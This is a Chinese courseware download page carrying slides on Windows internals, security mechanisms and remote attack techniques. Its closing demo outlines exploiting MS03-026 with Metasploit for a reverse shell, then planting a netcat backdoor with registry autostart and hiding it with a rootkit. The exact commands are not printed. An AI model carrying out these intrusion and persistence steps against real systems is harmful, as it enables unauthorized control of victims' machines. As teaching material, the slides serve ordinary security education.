网络信息安全论文PPT课件下载

这是一个关于网络信息安全论文PPT课件，主要介绍1.Windows操作系统简介、Windows的安全结构和机制、Windows系统远程攻击/Windows系统本地攻击。Windows系统安全攻防技术内容 1.Windows操作系统简介 2.Windows的安全结构和机制 3.Windows系统远程攻击 4.Windows系统本地攻击桌面操作系统市场份额微软Windows操作系统的市场占有率 Windows操作系统发展轨迹桌面(客户端)操作系统 1990: Windows 3.x 1995-1999: Windows 95, 98, ME(4.x) 2000: Windows 2000 Pro(5.0.x) 2001: Windows XP(5.1.x) 2007: Windows Vista(6.0.x) 2009: Windows 7(6.1.x) 2012:Windows 8 (6.2.x) 服务器操作系统 1993: Windows NT (3.x, 4.x) 2000: Windows 2000 Server(5.0.x) 2003: Windows Server 2003 (5.2.x) 2008: Windows Server 2008 (6.x) Windows NT 5.x系列操作系统 Windows 2000 Pro/Windows XP Windows 2000 Server/Windows Server 2003 简化的Windows结构简化的Windows结构注意到中间有一条线把Windows操作系统的用户模式(user mode)和内核模式(kernel mode )两部分划分开来。线上面的方框代表了用户模式的进程，线之下的组件是内核模式的操作系统服务。用户模式的线程在一个受保护的进程地址空间中执行(不过，当它们在内核模式中执行的时候，它们可以访问系统空间)，欢迎点击下载网络信息安全论文PPT课件哦。

网络信息安全论文PPT课件是由红软PPT免费下载网推荐的一款学校PPT类型的PowerPoint.

Windows系统安全攻防技术内容 1.Windows操作系统简介 2.Windows的安全结构和机制 3.Windows系统远程攻击 4.Windows系统本地攻击桌面操作系统市场份额微软Windows操作系统的市场占有率 Windows操作系统发展轨迹桌面(客户端)操作系统 1990: Windows 3.x 1995-1999: Windows 95， 98， ME(4.x) 2000: Windows 2000 Pro(5.0.x) 2001: Windows XP(5.1.x) 2007: Windows Vista(6.0.x) 2009: Windows 7(6.1.x) 2012:Windows 8 (6.2.x) 服务器操作系统 1993: Windows NT (3.x， 4.x) 2000: Windows 2000 Server(5.0.x) 2003: Windows Server 2003 (5.2.x) 2008: Windows Server 2008 (6.x) Windows NT 5.x系列操作系统 Windows 2000 Pro/Windows XP Windows 2000 Server/Windows Server 2003 简化的Windows结构简化的Windows结构注意到中间有一条线把Windows操作系统的用户模式(user mode)和内核模式(kernel mode )两部分划分开来。线上面的方框代表了用户模式的进程，线之下的组件是内核模式的操作系统服务。用户模式的线程在一个受保护的进程地址空间中执行(不过，当它们在内核模式中执行的时候，它们可以访问系统空间)。因此，系统支持进程、服务进程、用户应用程序和环境子系统都有它们各自的私有进程地址空间。基本的用户模式进程(1) 固定的(或者硬性指定的)系统支持进程(system support processes)，比如登录(logon)进程和会话管理器(session manager )，它们并不是Windows的服务。也就是说，它们不是由服务控制管理器来启动的基本的用户模式进程(2) 服务进程(service processes)负责的是Windows服务，比如任务调度器(Task Scheduler )和假脱机服务 Windows服务的运行通常要独立于用户登录。许多Windows服务器应用，比如Microsoft SQL Server和Microsoft Exchange Server，也包含了一些以Windows服务方式来运行的组件； 基本的用户模式进程(3) 用户应用程序(user applications )有六种类型 Windows 32位 Windows 64位 Windows 3.1 16 位 MS-DOS 16位 POSIX 32位 OS/2 32位；基本的用户模式进程(4) 环境子系统服务器进程(environment subsystem server processes)实现了操作系统环境的支持部分。所谓的环境是指操作系统展示给用户或者程序员的个性化部分。 Windows NT发布时带了三个不同的环境子系统：Windows、POSIX和OS/2 Windows XP，在基本的产品中只有 Windows子系统随产品一起发布——不过，一个增强的POSIX 子系统也可以使用，它是针对Unix产品的免费服务的一部分。核心子系统DLL 在Windows下，用户应用程序并不直接调用原始的Windows操作系统服务，相反，它们通过一个或者多个子系统动态链接库(DLLs)来发起调用。子系统DLL 的角色是，将一个已文档化的函数转化为一些恰当的内部(通常是未文档化的)Windows系统服务调用。 Windows的内核模式组件(1) Windows执行体(executive )包含了基本的操作系统服务，比如内存管理、进程和线程管理、安全性、I/O、网络和跨进程通信。 Windows的内核模式组件(2) Windows内核(kernel )是由一组低层次的操作系统功能构成的，比如线程调度(thread scheduling)、中断(interrupt )和异常分发(exception dispatching )，以及多处理器同步。它也提供了一组例程和基本对象。执行体的其余部分利用这些例程和对象实现更高层次的功能。执行体对象和内核对象 Windows的内核模式组件(3) 设备驱动程序(device drivers )既包括硬件设备驱动程序，也包括文件系统和网络驱动程序。其中硬件设备驱动程序将用户的I/O 函数调用转换成特定的硬件设备I/O 请求。 Windows的内核模式组件(4) 硬件抽象层(HAL，Hardware Abstraction Layer)是指一层特殊的代码，它把内核、设备驱动程序和Windows执行体的其余部分，跟与平台相关的硬件差异(比如不同主板的差异)隔离开来。 Windows的内核模式组件(5) 窗口和图形系统(windowing and graphic system )实现了图形用户界面(GUI )函数(更为人们熟知的叫法是Windows USER和GDI 函数)，比如对窗口的处理、用户界面控件，以及绘制等。 Windows系统核心结构和组件 Windows的进程和线程管理 Windows下的进程和线程可执行程序: 静态指令序列进程：一个容器，包含至少一个执行线程线程：进程内部的指令执行实体 Windows进程 Windows进程的组成(从最高抽象层次看) 一个私有的虚拟地址空间一个可执行的程序，定义了代码和数据，并被映射到进程的虚拟地址空间一个已经打开句柄的列表指向各种资源，比如信号量、文件，该进程的所有线程都可访问这些系统资源一个被称为访问令牌的安全环境标识与该进程关联的用户、安全组和特权一个被称为进程ID的唯一标识至少一个执行线程 Windows进程 Windows进程的关键数据结构执行体进程块(EPROCESS， Executive Process Block) 执行体进程对象的对象体，包括进程ID、父进程ID、程序名、进程优先级、内存管理信息、设备映像等。核心进程块(KPROCESS， Kernel Process Block) 内核进程对象的对象体，又称PCB，包括线程调度时需要的信息，如进程状态、线程时间片等。进程环境块(PEB， Process Environment Block) 包括用户态代码需要和修改的信息。 Windows环境子系统核心态部件win32k.sys为每个进程建立的进程信息数据结构WIN32KPROCESS Windows环境子系统进程csrss(用户态空间)为每个进程建立的进程信息数据结构 Windows线程组成线程的基本部件一组代表处理器状态的CPU寄存器中的内容两个栈一个用于当线程在内核模式下执行的时候，另一个用于线程在用户模式下执行的时候。一个被称为线程局部存储区(TLS， Thread Local Storage)的私有存储区域各个子系统、运行库和DLL都会用到该存储区域一个被称为线程ID的唯一标识符安全环境 Windows线程 Windows线程的关键数据结构执行体线程块(ETHREAD， Executive Thread Block) 执行体线程对象的对象体，包括：进程ID、起始执行地址、访问令牌、LPC消息、定时器信息、KTHREAD等。核心线程块(KTHREAD， Kernel Thread Block) 内核线程对象的对象体，包括线程调度信息、同步信息、核心栈信息等。线程环境块(TEB， Thread Environment Block) 包括用户态代码需要和修改的信息。 Windows环境子系统核心态部件win32k.sys为每个线程建立的线程信息数据结构WIN32THREAD Windows环境子系统进程csrss(用户态空间)为每个线程建立的线程信息数据结构 Windows进程线程模型 Windows进程线程模型 Windows进程线程内部数据结构 EPEOCESS & KPROCESS Windows进程线程内部数据结构 PEB Windows进程线程内部数据结构 ETHREAD & KTHREAD Windows进程线程内部数据结构 TEB Windows进程的创建过程与进程相关的函数 Windows的内存管理 Windows虚拟地址空间 Windows系统核心内存区间 Windows内存空间 Windows虚拟地址空间虚拟地址空间(Virtual address space) A set of virtual memory addresses that a process can use. 特点平面(线形)空间大小和物理内存无关每个进程拥有的私有地址空间，其他的进程在未经允许的条件下不能访问此地址空间 Windows虚拟地址空间 32-bit x86 地址空间虚拟地址空间最大为4GB Windows虚拟地址空间 Windows虚拟地址空间 64-bit Address Spaces Windows内存管理器 Windows的内存管理器是执行体(Executive)的一部分，位于文件Ntoskrnl.exe中 Windows内存管理器内存管理器的主要任务将一个进程的虚拟地址空间映射到物理内存中(mapping)。数据交换(swap)。当物理内存被过度使用时，将内存中的一些内容转移到磁盘上；并且，在以后需要这些内容时，再将它们读回到物理内存中。 Windows内存管理器内存管理器提供的服务(面向用户) 分配和释放虚拟内存进程之间共享内存将文件映射到内存将虚拟页面刷新到内存获得虚拟页面的信息改变虚拟页面的保护属性将虚拟页面锁在内存 …… Windows的内存管理方案 Windows内存管理采用的是虚拟页式管理方案，默认情况下，每个页面大小为4KB。 Windows页面组织方式(二级页表结构) 页表(Page Table): A page of mapping information Windows的内存管理方案页目录(Page directory) Windows的内存管理方案 Windows虚拟地址变换 x86系统32位虚拟地址结构 Windows虚拟地址变换地址变换过程(x86系统) Windows页面错误在页面表换该过程中，可能会发现PTE的有效位被清除的情况，这表明出于某种原因，该页面无法被当前进程访问。在此对一个无效页面的引用被称为页面错误(page fault) 引发错误的原因缺页页面在内存，但在备用或修改队列中访问违例 …… Windows页面错误缺页错误的处理方法采用请求调页和页簇化技术当发生缺页中断时，windows内存管理器将所需页面及其之前或之后的少量页面一起加载到内存中。根据程序行为局部性理论，这种页簇化技术可以减少缺页中断次数。 Windows系统中如果缺页的原因是因为引用数据页面错误，则簇的大小为3，否则为7。不同的 Windows 版本支持内存数 Win32 Process memory Windows文件系统:FAT12，FAT16，FAT32 FAT（File Allocation Table，文件分配表）文件系统属遗产文件系统。为了向后兼容，也为了方便用户升级，Windows 2000/XP仍然提供对FAT的支持 每一种FAT文件系统都用一个数字来标识磁盘上簇号的位数。例如，FAT12的簇标识为12位（二进制数），这限制了它的单个分区最多只能存储2 12（=4096）个簇，而FAT 12在Windows 2000/XP中的簇大小在512B与8KB之间，这意味着FAT12卷的大小至多只有32M。 FAT卷的结构: Boot Sector + FAT1 + FAT2 +Root +Other dirs and files FSD:\Winnt\System32\Drivers\Fastfat.sys Windows 2000/XP文件系统：NTFS NTFS是Windows 2000/XP的首选文件系统 NTFS的簇标识为64位（二进制数）（但是Windows 2000有限制）文件与目录的安全性文件与目录的压缩文件与目录的加密文件与目录的可恢复性。 NTFS系统 NTFS的卷结构 NTFS卷中的文件名 使用NTFS文件系统管理资源 PE: Portable Executable 可移植的可执行文件 (PE) 是一种用于可执行文件、目标文件和动态链接库的文件格式，主要使用在32位和64位的Windows操作系统上。 “可移植的”是指该文件格式的通用性，可用于许多种不同的操作系统和体系结构中。 PE文件格式封装了Windows操作系统加载可执行程序代码时所必需的一些信息。这些信息包括动态链接库、API导入和导出表、资源管理数据和线程局部存储数据。 PE文件格式主要用于.exe文件、.dll文件、.sys（驱动程序）和其他文件类型(.cpl， .ocx， .scr， .drv)。 PE文件格式总结整个PE格式的组成：一个MS-DOS 的MZ 头部，之后是一个实模式的残余程序、PE 文件标志、PE 文件头部、PE 可选头部、所有的段头部，最后是所有的段实体。可选头部的末尾是一个数据目录入口的数组，这些相对虚拟地址指向段实体之中的数据目录。每个数据目录都表示了一个特定的段实体数据是如何组织的。 PE 文件格式有9个预定义段，每个应用程序可以为它自己的代码以及数据定义它自己独特的段。 .debug 预定义段也可以分离为一个单独的调试文件。如果这样的话，就会有一个特定的调试头部来用于解析这个调试文件，PE 文件中也会有一个标志来表示调试数据被分离了出去。 Windows系统的注册表 Windows系统注册表 Windows配置和控制方面关键角色系统全局配置的存储仓库每个用户配置信息的存储仓库注册表查找编辑工具 Regedit.exe 注册表的读写读取: 系统引导过程， 系统登录过程， 应用程序启动过程修改: 缺省安装， 应用程序安装， 设备驱动安装， 修改应用程序配置注册表在文件系统上的存储(Hive) HKLM\SYSTEM\CurrentControlSet\Control\hivelist 注册表监视工具 RegMon 注册表ASEP点自动启动可扩展点 (ASEP) ASEP 可让程序不经用户操作即可启动。一个 ASEP 可以接受一个或多个 ASEP 挂钩，其中每个 ASEP 挂钩与一个程序关联。注册表ASEP点经常被恶意代码/攻击者利用 Windows网络体系结构网络驱动程序接口规范层 NDIS Network Driver Interface Specification (NDIS) Layer NDIS提供从网络传输系统到物理设备（如网络适配器）的通信路径。 NDIS扮演着网络适配器和网络协议之间的边界层角色，管理这些组件之间的绑定工作。 NDIS增加了对面向连接网络介质(例如ATM和ISDN)的支持，并继续支持传统的无连接网络介质，如以太网、令牌环网、FDDI等。 NDIS包含直接和网络适配器连接的微端口驱动程序。网络协议层 Network Protocol Layer 网络协议为客户机提供服务，这些服务允许应用程序或客户机通过网络发送数据。网络协议包括TCP/IP、ATM、IPX/SPX、NetBEUI、IrDA、AppleTalk和DLC。通过Microsoft的SNA Server，也可应用系统网络体系结构(SNA)协议。传输驱动程序接口层 Transport Driver Interface Layer 传输驱动程序接口(TDI)在网络协议和协议客户机(如应用程序、网络重定向器或网络应用编程接口API)间提供了一个标准接口。网络应用编程接口层 Network Application Programming Interface Layer 网络应用编程接口API为网络应用和服务提供标准编程接口。支持Winsock、NetBIOS、电话API(TAPI)、消息API(MAPI)、WNet API和其他服务。进程间通信层 Interprocess Communications Layer 进程间通信(IPC)支持客户机/服务器计算和分布式处理。它们支持的服务有远程过程调用(RPC)、分布式组件对象模型(DCOM)、命名管道、邮筒(mailslot)和通用Internet文件系统(CIFS)。基本网络服务层 Basic Network Services Layer 基本网络服务层通过提供服务支持网络用户的应用程序。服务包括网络地址管理、名字服务、文件服务和高级网络服务，例如IPSec和QoS。 Windows的安全结构和机制 Windows安全性设计目标一致的、健壮的、基于对象的安全模型满足商业用户的安全需求， 达到CC评估标准EAL4 AAA: 身份验证、授权、审计一台机器上多个用户之间安全地共享资源进程，内存，设备，文件，网络安全模型服务器管理和保护各种对象客户通过服务器访问对象服务器扮演客户，访问对象访问的结果返回给服务器攻击者目标在拥有最高权限的用户帐户环境中执行命令。引用监控器模型引用监控器与其他安全措施的关系模型 Windows 基础的安全机制基于引用监控器经典安全模型核心：内核中的SRM 安全引用监控器用户态中的LSASS(Local Security Authority Subsystem Service)安全服务其他 Winlogon/Netlogon/Eventlog 实现对主体用户的身份认证机制、对所有对象的访问控制机制，以及对访问的安全审计机制 Winlogo进程与LSASS中的Netlogon分别负责Windows本地和远程登录用户的身份认证，利用LSASS所提供的身份验证服务，来确定安全主体身份的真实性。 内核中的安全引用监控器，根据LSASS服务配置的安全访问控制策略，负责对所有安全主题访问Windows资源对象的授权访问控制 安全引用监控器根据LSASS服务配置的安全审计策略，对访问过程中关注的事件进行记录，并由EventLog生成系统审计日志。 Windows系统的安全组件访问控制的判断（Discretion access control） 允许对象所有者可以控制谁被允许访问该对象以及访问的方式。 对象重用（Object reuse） 当资源（内存、磁盘等）被某应用访问时，Windows 禁止所有的系统应用访问该资源，这也就是为什么无法恢复已经被删除的文件的原因。 强制登录（Mandatory log on） 要求所有的用户必须登录，通过认证后才可以访问资源审核（Auditing） 在控制用户访问资源的同时，也可以对这些访问作了相应的记录。对象的访问控制（Control of access to object） 不允许直接访问系统的某些资源。必须是该资源允许被访问，然后是用户或应用通过第一次认证后再访问。 Windows安全子系统的组件 安全标识符（Security Identifiers）: 就是我们经常说的SID，每次当我们创建一个用户或一个组的时候，系统会分配给改用户或组一个唯一SID，当你重新安装系统后，也会得到一个唯一的SID。 SID永远都是唯一的，由计算机名、当前时间、当前用户态线程的CPU耗费时间的总和三个参数决定以保证它的唯一性。 例： S-1-5-21-1763234323-3212657521-1234321321-500 访问令牌（Access tokens）: 用户通过验证后，登陆进程会给用户一个访问令牌，该令牌相当于用户访问系统资源的票证，当用户试图访问系统资源时，将访问令牌提供给Windows 系统，然后Windows NT检查用户试图访问对象上的访问控制列表。如果用户被允许访问该对象，系统将会分配给用户适当的访问权限。 访问令牌是用户在通过验证的时候有登陆进程所提供的，所以改变用户的权限需要注销后重新登陆，重新获取访问令牌。 Windows安全子系统的组件安全描述符（Security descriptors）： Windows 系统中的任何对象的属性都有安全描述符这部分。它保存对象的安全配置。访问控制列表（Access control lists）： 访问控制列表有两种：任意访问控制列表（Discretionary ACL）、系统访问控制列表（System ACL）。任意访问控制列表包含了用户和组的列表，以及相应的权限，允许或拒绝。每一个用户或组在任意访问控制列表中都有特殊的权限。而系统访问控制列表是为审核服务的，包含了对象被访问的时间。访问控制项（Access control entries）: 访问控制项（ACE）包含了用户或组的SID以及对象的权限。访问控制项有两种：允许访问和拒绝访问。拒绝访问的级别高于允许访问。 Windows 安全子系统 Windows安全子系统 Winlogon and Gina: Winlogon调用GINA DLL，并监视安全认证序列。而GINA DLL提供一个交互式的界面为用户登陆提供认证请求。GINA DLL被设计成一个独立的模块，当然我们也可以用一个更加强有力的认证方式（指纹、视网膜）替换内置的GINA DLL。 Winlogon在注册表中查找\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ，如果存在GinaDLL键，Winlogon将使用这个DLL，如果不存在该键，Winlogon将使用默认值MSGINA.DLL Windows安全子系统本地安全认证（Local Security Authority）： 本地安全认证（LSA）是一个被保护的子系统，它负责以下任务：调用所有的认证包，检查在注册表\HKLM\SYSTEM\CurrentControlSet\Control\LSA下AuthenticationPAckages下的值，并调用该DLL进行认证（MSV_1.DLL）。在4.0版里，Windows NT会寻找\HKLM\SYSTEM\CurrentControlSet\Control\LSA 下所有存在的SecurityPackages值并调用。重新找回本地组的SIDs和用户的权限。创建用户的访问令牌。管理本地安装的服务所使用的服务账号。储存和映射用户权限。管理审核的策略和设置。管理信任关系。 Windows安全子系统安全支持提供者的接口（Security Support Provide Interface）： 微软的Security Support Provide Interface很简单地遵循RFC 2743和RFC 2744的定义，提供一些安全服务的API，为应用程序和服务提供请求安全的认证连接的方法。 认证包（Authentication Package）： 认证包可以为真实用户提供认证。通过GINA DLL的可信认证后，认证包返回用户的SIDs给LSA，然后将其放在用户的访问令牌中。 Windows安全子系统安全支持提供者（Security Support Provider）： 安全支持提供者是以驱动的形式安装的，能够实现一些附加的安全机制，默认情况下，Windows NT安装了以下三种： Msnsspc.dll：微软网络挑战/反应认证模块 Msapsspc.dll：分布式密码认证挑战/反应模块，该模块也可以在微软网络中使用 Schannel.dll：该认证模块使用某些证书颁发机构提供的证书来进行验证，常见的证书机构比如Verisign。这种认证方式经常在使用SSL（Secure Sockets Layer）和PCT（Private Communication Technology）协议通信的时候用到。 Windows安全子系统网络登录（Netlogon）： 网络登录服务必须在通过认证后建立一个安全的通道。要实现这个目标，必须通过安全通道与域中的域控制器建立连接，然后，再通过安全的通道传递用户的口令，在域的域控制器上响应请求后，重新取回用户的SIDs和用户权限。 安全账号管理者（Security Account Manager）： 安全账号管理者，也就是我们经常所说的SAM，它是用来保存用户账号和口令的数据库。保存了注册表中\HKLM\Security\Sam中的一部分内容。不同的域有不同的Sam，在域复制的过程中，Sam包将会被拷贝。 Windows的密码系统 Windows NT及Win2000中对用户帐户的安全管理使用了安全帐号管理器(security account manager)的机制，安全帐号管理器对帐号的管理是通过安全标识进行的，安全标识在帐号创建时就同时创建，一旦帐号被删除，安全标识也同时被删除。安全标识是唯一的，即使是相同的用户名，在每次创建时获得的安全标识都时完全不同的。因此，一旦某个帐号被删除，它的安全标识就不再存在了，即使用相同的用户名重建帐号，也会被赋予不同的安全标识，不会保留原来的权限。 Windows登录验证模型 Windows NT/2000/XP的系统登录过程登录是通过登录进程WinLogon、LSA、一个或多个身份认证包和SAM的相互作用发生的身份认证包：执行身份验证检查的动态链接库。 Msvl_0：用于交互式登录的身份认证包 WinLogon：一个受托进程，负责管理与安全性相关的用户相互作用是从键盘截取登录请求的唯一进程 Windows登录验证过程（以NT为例） Windows远程登录身份验证早期：SMB验证协议，在网络上传输明文口令 LM LM Manager Challenge/Response验证机制 验证机制简单，容易被破解 NTLM Windows NT挑战/响应验证机制 NTLM v2 Kerberos Network Authentication，以NTLM为例 Windows安全技术 Windows NT/2000/XP中的常用安全技术 Windows身份验证与访问控制 Windows审核机制 Windows注册表 Windows加密文件系统 Windows基准安全注意事项 Windows Audit机制 Windows 2000默认安装没有打开任何安全审计 控制面板 管理工具 本地安全策略 本地策略 审计策略以账户管理事件为例创建（624）和启用（626）账户更改账户密码（627，628）更改账户状态（629，630）对安全组的修改（632，633；636，637）账户锁定（644，642） 一旦打开上述审计事件，安全审计就会将相关事件在事件查看器的日志中记录下来修改审计策略后，要重启机器。对文件和文件夹的审计必要条件 NTFS 打开“对象访问”事件审核策略 审核设置步骤 ”右键“待审核文件文件夹，”属性“”安全“”高级“”审核”“添加”“确定” 选择“审核项目” 6种审计日志应用程序日志应用程序和系统产生的事件系统日志操作系统自身产生的事件，包括驱动等组件安全日志安全事件相关信息例如：与监视系统、用户和进程活动相关的信息；启动失败等安全服务相关信息目录服务日志文件复制日志 DNS服务日志事件查看器审计系统服务对象管理器有效的Win32函数 调用审计系统服务的进程必须具有SeAuditPrivilege特权 可以防止恶意“淹没”“安全日志” Windows系统的审计数据二进制结构文件形式存于物理磁盘每条记录：事件发生事件事件源 Windows安全技术 Windows NT/2000/XP中的常用安全技术 Windows身份验证与访问控制 Windows审核机制 Windows注册表 Windows加密文件系统 Windows基准安全注意事项 Windows的注册表早期，对系统环境的配置通过*.ini进行 Windows95之后，注册表 注册表是一种数据库集中存储各种信息资源，包括各种配置信息 注册表的“键”和“键值” 注册表编辑器：树型 系统定义关键字（预定义关键字）应用程序定义关键字键值：值的名称＋值的数据类型＋值系统预定义的5个组关键字 HKEY_CLASSES_ROOT HKEY_CURRENT_USER HKEY_LOCAL_MACHINE HKEY_USERS HKEY_CURRENT_CONFIG HKEY_CLASSES_ROOT HKEY_CURRENT_USER HKEY_LOCAL_MACHINE 用来控制系统和软件的设置针对所有用户，是公共配置信息，与具体用户无关 5个子键 HKEY_USERS 各个用户相关的设置桌面、背景、开始菜单程序项、等等 HKEY_CURRENT_CONFIG 计算机的当前配置情况显示器、打印机等可选外部设备及其配置信息 … 注册表的备份与恢复导出导入注册表安全默认，注册表的安全级别较高管理员：完全访问权限其他用户：自己用户账户相关的特权指派 Windows安全技术 Windows NT/2000/XP中的常用安全技术 Windows身份验证与访问控制 Windows审核机制 Windows注册表 Windows加密文件系统 Windows基准安全注意事项 Windows加密文件系统加密文件系统，Encrypted File System，EFS 用于在NTFS上存储已加密的文件加密过程对用户透明与使用未加密文件和文件夹一样 文件/文件夹（推荐）加密属性加密示例命令行加密命令cipher EFS注意点只有NTFS上的文件和文件夹才能被加密不能加密压缩的文件或文件夹加密的文件被复制或移动到非NTFS格式的卷上，会被解密非加密文件移动到加密文件夹中，自动加密。 反之不成立。 “系统”属性的文件，无法加密。位于%SYSTEMROOT%目录结构中的文件，也是如此加密文件或文件夹不能防止删除/列出文件/目录建议结合NTFS的访问控制来使用EFS 在允许进行远程加密的远程计算机上可以加密/解密文件/目录。但，在网络上传输的数据并未加密 EFS 对称加密技术＋非对称加密技术文件加密密钥与用户的EFS证书对应的公钥 EFS的故障恢复策略故障恢复代理 指获得授权解密由其他用户加密的数据的个人 Windows安全技术 Windows NT/2000/XP中的常用安全技术 Windows身份验证与访问控制 Windows审核机制 Windows注册表 Windows加密文件系统 Windows基准安全注意事项 Windows基准安全注意事项验证所有磁盘分区是否都用NTFS格式化禁用不必要的服务禁用或删除不必要的账户确保禁用来宾（guest）账户防止注册表被匿名访问限制对LSA信息进行访问设置密码策略设置账户锁定策略配置管理员账户安装防毒软件和更新安装最新的Service Pack 安装适当的Service Pack后的安全修补程序补充安全设置 Windows 系统远程攻防技术基本远程攻击技术远程口令猜测与破解攻击暴力破解基于字典的猜测中间人身份认证欺骗攻击攻击Windows网络服务利用Windows系统的网络服务程序的漏洞进行远程渗透攻击攻击Windows客户端及用户利用浏览器及应用软件客户端进行渗透攻击 Windows系统的安全漏洞生命周期安全漏洞 Security Vulnerability，安全脆弱性一般认为，漏洞是指硬件、软件或策略上存在的的安全缺陷，从而使得攻击者能够在未授权的情况下访问、控制系统 Windows安全漏洞发现、利用与修补黑白道上的人致力于软件安全性分析研究，发掘Windows操作系统组件、网络服务以及第三方软件中存在的安全漏洞。安全漏洞的披露方式软件厂商 向公众披露软件缺陷将为攻击者开发漏洞渗透攻击代码和制作恶意代码提供帮助安全研究人员厂商希望掩盖其失误，公开披露漏洞信息将使企业和个人能够更好地保护他们的系统。不稳定的妥协安全研究人员向厂商通报漏洞信息，等待厂商公布补丁软件后再向公众公开，厂商则给予研究人员相应的荣誉。 Windows安全漏洞 Windows安全漏洞发布 Microsoft Security Bulletin: http://www.microsoft.com/technet/security/current.aspx 微软安全公告: http://www.microsoft.com/china/technet/security/current.mspx 微软安全漏洞编号方式: MSXX(年份编号)-0XX(漏洞发布次序) 远程渗透可利用的安全漏洞安全漏洞后果类型: 远程执行代码安全漏洞危害等级: 重要或严重本地渗透可利用的安全漏洞安全漏洞后果类型: 本地特权提升安全漏洞危害等级: 重要或严重当前的漏洞趋势每年公布的漏洞数量 总结当前的许多攻击受到经济利益驱使 Web应用程序漏洞占一半比例浏览器漏洞下降，但插件带来更多地威胁在对抗共同攻击方面有所进展移动平台受到更多的关注如何对特定目标进行远程渗透测试? 漏洞扫描: 确定目标系统存在哪些已知漏洞 Nessus/XScan/… 如何查看漏洞扫描结果安全漏洞索引: Nessus ID –MS安全漏洞编号–CVE安全漏洞编号–BID编号 Nessus ID 19402 -> MS05-039 -> CVE-2005-1983 -> BID 14513 了解安全漏洞细节信息根据安全漏洞编号找出安全漏洞具体描述信息安全漏洞影响软件范围、攻击目标服务、具体位置、后果类型、严重等级… 如何对特定目标进行远程渗透测试? 查找已知安全漏洞的渗透攻击代码黑客社区重要的共享资源并非每个已知安全漏洞都存在公开渗透代码软件流行度、漏洞危害后果类型和等级: 渗透代码价值安全漏洞补丁情况: 渗透代码的有效性安全漏洞利用难度: 渗透代码编写代价并非所有渗透代码都会公开渗透代码(特别是0day)存在重要价值获取到的渗透代码并非所有情况都适用目标系统操作系统平台差异，语种差异→用于覆盖的ret值差异著名渗透代码资源: milw0rm， bid， metasploit， packetstorm， FrSIRT(not free)… 如何对特定目标进行远程渗透测试? 渗透测试选择特定目标存在安全漏洞对应的渗透代码远程渗透: 安全漏洞可通过网络服务进行利用想拿到shell: 安全漏洞后果为远程执行代码了解渗透代码和攻击目标软件环境的匹配性攻击目标软件环境: 操作系统版本、语种、网络服务版本， … 渗透代码支持范围只支持/测试过哪些目标环境自己扩展渗透代码所支持的范围: 进阶课程<缓冲区溢出和Shellcode> 进行实际渗透测试实验享受成功的喜悦直面失败的郁闷，找出问题并解决: 从脚本小子到技术高手的必经之路 RPC服务最普遍的模式和执行是开放式软件基础的分布式计算环境（DCE） MS RPC 与其兼容攻击Windows RPC服务 MS RPC服务 TCP 135 RPC本身漏洞: MS07-029、MS04-012、MS03-039、MS03-026、… 利用RPC服务利用漏洞: MS04-011、… SMB 协议 SMB(Server Message Block)通信协议 1987年制定，作为Microsoft网络的通讯协议。 SMB使用了NetBIOS的API接口 一个开放性的协议，允许协议扩展变得更大而且复杂大约65个最上层的作业，而每个作业都超过120个函数，甚至Windows NT也没有全部支持到，微软把 SMB 改名为 CIFS(Common Internet File System)。 SMB协议是基于TCP， 端口使用为139，445 攻击Windows SMB服务 SMB服务TCP 139/445 SMB本身漏洞: MS08-063、MS07-063、MS05-027 利用SMB服务利用漏洞: 非常多即插即用服务: MS07-019、MS05-047、MS05-039 活动目录服务: MS08-060、MS07-039  MS DTC MS DTC(Distributed Transaction Coordinator) 微软分布式传输协调程序调用系统Microsoft Personal Web Server和Microsoft SQL Server 该服务用于管理多个服务器攻击MSDTC服务 MSDTC服务TCP 1025 MS05-051 IIS基础 Windows 攻击场景演示配置 Nessus 扫描靶机通过Metasploit 攻击MS03-026 漏洞，获得远程访问权在攻击机上运行Metasploit ， 可以查找到攻击漏洞MS03-026 的exploit (windows / dcerpc / ms03_026_dcom) 以及一个可用的payload (generic / shell_reverse_tcp)。其中，该payload 的作用是让靶机返回一个命令行。在攻击机上键入以下命令，对靶机进行攻击。 攻击成功后获得了靶机的一个命令行。编写FTP批处理命令，下载本地攻击文件获得了靶机的命令行后，先在C盘创建一个文件夹hidennc，这是存放后门创建所需文件的文件夹。 执行完上述命令后，可以在C盘hidennc文件夹下面看到命令列表command.txt，以及从FTP服务器下载的三个文件。使用netcat添加命令行后门 Netcat是一个功能强大的工具，但大小仅为60KB，所以被誉为瑞士军刀。Netcat可以通过若干选项的组合，达到创建后门的效果。一个可行的方案为添加注册表自启动项使得后门开机自启动从FTP服务器下载的三个文件中，有个一名为AddReg.bat。这个批命令程序修改了注册表的启动项，使得靶机在开机阶段自动运行netcat创建的后门。其中注册表的启动项为 AddReg.bat的内容为使用reg命令(1) AddReg.bat的内容为使用reg命令(2) 运行完AddReg.bat，靶机的注册表启动项被修改使用AFXRootkit隐藏后门进程、文件、注册表项当hidennc下面出现hook.dll文件时，后门隐藏成功。使用netcat连接后门，执行指定攻击命令 IIS基础 IIS (Intenet Information Services， Internet信息服务) 微软在Windows服务器操作系统中集成的Web/FTP/Email/NNTP网络服务 HTTP: 基于文本的Web应用协议 CGI (common gateway interface) 给HTTP请求加上动态能力，生成相应动态页面 CGI程序在服务器端被调用执行，反馈动态执行结果 ASP (Active Server Pages) VBScript等脚本语言编写克服CGI效率低下，由服务器解释执行 ISAPI 因特网服务器应用编程接口通过ISAPI动态链接库扩展IIS本身功能` 各种版本安全性 IIS的发展伴随着安全漏洞；随着IIS 6.0的发布，这种情况有所好转。 在低于6.0的版本中，其用户权限是系统用户；而在IIS 6.0中，引入了网络服务帐户，这是一个限制用户。这样，即使服务遭到破坏，也不会造成系统的瘫痪。 IIS进程模型-IIS6之前 IIS进程(inetinfo.exe)运行在LocalSystem帐户环境静态内容请求: IIS进程为来自因特网匿名用户创建一个临时用户帐户并提供服务: IUSER_MACHINENAME帐户 ASP/ISAPI内容请求 IIS4: ISAPI都以LocalSystem身份运行在inetinfo进程内 IIS5: OOP(进程外)模式， ISAPI以IWAM_MACHINENAME身份(Guests用户组)运行在dllhost.exe进程 IIS进程模型-IIS6 IIS6进程模型 HTTP监听进程(listener， HTTP.sys): Windows内核模式TCP/IP协议栈工作进程(worker): 用户模式，负责处理各个HTTP请求用到的ISAPI/API脚本和COM组件均运行在负责具体处理这一请求的工作进程 IIS中的FTP/NNTP/SMTP仍由inetinfo进程负责处理 IIS的工作流程 HTTP.SYS 